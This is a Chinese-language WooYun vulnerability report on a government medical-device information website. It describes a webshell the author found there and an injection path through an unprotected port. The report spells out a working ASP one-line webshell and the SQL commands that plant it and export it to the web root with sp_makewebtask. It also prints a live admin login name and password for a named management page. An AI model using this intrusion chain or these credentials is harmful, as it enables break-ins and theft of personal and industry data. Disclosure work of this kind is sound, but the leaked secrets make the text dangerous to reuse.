WooYun.org

国家食品药品监督管理局信息中心主办的-----中国医疗器械信息网(CMDI)
网站:http://www.cmdi.gov.cn

#---#一句话引出的线索
通过Google hack搜索到了这样一个asp文件
http://www.cmdi.gov.cn:5555/tz/test.asp

似乎并没有什么特别,但是他的底下的

%3c%25execute request(%22@%22)%25%3e

刺激到了我敏感的神经,不错,是一句话!不过是unicode格式的,转换过来应该是

<%execute request("@")%>

密码是@,显然这是通过sql命令在数据库建表插入一句话后的成果，看了一下这个asp文件的源码，其中tittle显示“Microsoft SQL Server Web 助手”也更加印证了我的猜测

看来这个站已经有人光临了。
#---#另类绕过防注入
那么既然是通过数据库建表，那么一定注入没错，信心满满的把http://www.cmdi.gov.cn用工具跑了一圈，居然没有可利用的注入点，蒙了。
但是我马上想到了刚才那个文件是出自http://www.cmdi.gov.cn:5555，先访问之，居然目录遍历了，还有一个“sql防注入工具”的文件夹

怪不得呢，那就拿http://www.cmdi.gov.cn:5555跑一圈，此时这个防注入工具似乎不起作用了，果然找到了我想要的，轻松射入，拿下数据库
#---#MYSQL建表拿webshell
有三个数据库，果不其然，在cmdi_db数据库中发现了test表，其中正是我们在前面看到的一句话

那他是如何做到传大马的呢？根据上面我们已经获得的这些信息可以很轻松的还原当时的渗透过程
1、首先在其得到数据库后通过sql命令先新建一个test表，字段pc，字段类型为字符型长度为255
命令如下：

create table test(pc char(255))

2、然后为字段赋值一句话，密码为@

insert into test(pc) values ('<%execute request("@")%>')

3、由于要在链接地址提交，因此要将一句话转换成unicode格式，也就是我们最开始看到的%3c%25execute request(%22@%22)%25%3e
sql命令变为：

insert into test(pc) values ('%3c%25execute request(%22@%22)%25%3e')

4、然后将test表导出为asp文件，也就是我们刚开始搜索到的那个test.asp文件
命令：

execute sp_makewebtask @outputfile='E:\Lotus\Domino\data\sbl\CMDI\tz\test.asp',@query='select pc from test'

在这里，路径就是你导出asp一句话文件的地方，而之前幸运的在那个可以遍历的目录里找到了几个显错的asp文件显示了路径
不过从之前发现这个test.asp文件的目录里一些上传的asp文件和日期可以看出，这位黑客并不是一次成功的
用得到的大马一看，服务器很好拿，权限高、端口开的多

找到一个管理入口http://www.cmdi.gov.cn:5555/work/EXPOCHECK.ASP
用户名和密码（sbl ylqx831 方便验证，请修改）居然没问显示着，就跟个后门似的

里面存在着大量的企业、以及行业从业人员的信息，影响全国整个医疗器械行业！

当然，服务器上还仍有许多资料信息，入侵将会给该行业信息安全带来威胁，并且在渗透过程中发现先前进入的这位黑客有篡改网站文件等行为，这种行为是白帽子所不耻的，强烈谴责这种行为，也希望网站管理方国家食品药品监督管理局信息中心能及时修复漏洞。
看在我花一早上时间写完突然断电又重写的份上，加个精？本来写的比这个详细，丢了就没心思继续了。。。。